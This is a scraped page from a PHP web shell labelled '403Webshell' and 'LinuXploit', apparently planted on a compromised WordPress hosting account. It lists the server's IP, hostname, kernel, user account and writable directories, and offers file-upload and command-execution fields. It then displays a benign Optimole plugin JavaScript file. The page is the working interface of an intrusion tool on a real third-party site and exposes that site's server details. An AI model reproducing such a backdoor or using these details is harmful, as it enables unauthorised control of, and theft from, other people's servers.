403Webshell
Server IP : 213.132.222.41  /  Your IP : 216.73.216.254
Web Server : Apache
System : Linux plesk4.nlhosting.net 6.1.0-0.deb11.50-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.176-1~deb11u1 (2026-07-02) x86_64
User : thecovenant ( 10927)
PHP Version : 8.3.32
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/thecovenant.nl/httpdocs/wp-content/plugins/optimole-wp/assets/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/thecovenant.nl/httpdocs/wp-content/plugins/optimole-wp/assets/js/media.js
jQuery(document).ready(function($) {
    jQuery('.move-image-optml').click(function() {
        //get the id and send a jquery rest request to the server
        var id = jQuery(this).data('id');
        var action = jQuery(this).data('action'); 
        moveImage(id, action, jQuery(this));
    }); 
});

function moveImage(id, action, element, is_retry = false) {
    //add a loading indicator
    element.parent().find('.spinner').addClass('is-active');
    element.parent().addClass('is-loading');
    jQuery.ajax({
        url:  optimoleMediaListing.rest_url,
        type: 'POST',
        headers: {
            'X-WP-Nonce': optimoleMediaListing.nonce
        },
        data: {
            action: action,
            status: is_retry ? 'check' : 'start',
            id: id  
        },
        success: function(response) {
            if(response.code === 'moved') {
                element.parent().find('.spinner').removeClass('is-active');
                element.parent().removeClass('is-loading'); 
                element.parent().find('.move-image-optml').toggleClass('hidden'); 

            }else if(response.code === 'error'){
                element.parent().find('.spinner').removeClass('is-active');
                element.parent().removeClass('is-loading'); 
                element.parent().text(response.data);
            }else{
                setTimeout(function() {
                    moveImage(id, action, element, true);
                }, 1000);
            }
        }
    });
}

Youez - 2016 - github.com/yon3zu
LinuXploit